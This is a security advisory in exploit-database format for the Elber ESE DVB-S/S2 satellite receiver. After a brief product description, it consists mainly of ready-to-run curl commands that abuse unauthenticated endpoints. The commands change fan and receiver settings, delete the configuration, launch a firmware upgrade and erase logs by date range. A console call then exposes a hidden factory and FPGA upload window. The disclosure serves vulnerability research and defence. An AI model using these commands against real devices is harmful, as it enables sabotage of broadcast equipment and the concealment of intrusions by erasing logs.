Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Exploit, Device Config

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
                  1.5.56 Revision 884
                  1.229 Revision 440

Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2024-5821
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php



# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.

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